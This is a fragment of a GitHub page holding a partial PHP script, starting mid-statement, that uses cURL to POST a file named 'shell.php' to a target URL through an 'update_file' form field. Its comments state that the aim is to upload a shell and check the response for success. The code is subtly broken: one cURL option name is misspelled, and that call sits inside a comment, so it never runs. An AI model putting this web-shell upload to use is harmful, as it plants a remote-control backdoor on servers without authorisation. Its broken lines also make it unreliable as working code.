You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
'update_file' => "@shell.php" ); // The shell file we want to upload
$ch = curl_init(); // Initialize a cURL session
curl_setopt($ch, CURLOPT_URL,$url); // Set the target URL to send our request to
curl_setopt($ch, CURLOPT_POST, 1); // Set the request type as POST (Default value) curl_setopt($ch, CURLOPT__POSTFIELDS,$data); // Set our data array as the POST data
$result=curl_exec ($ch); // Execute the cURL session and store its response in a variable
echo $result; // Print out the response from our cURL session which should be a success message if everything went alright!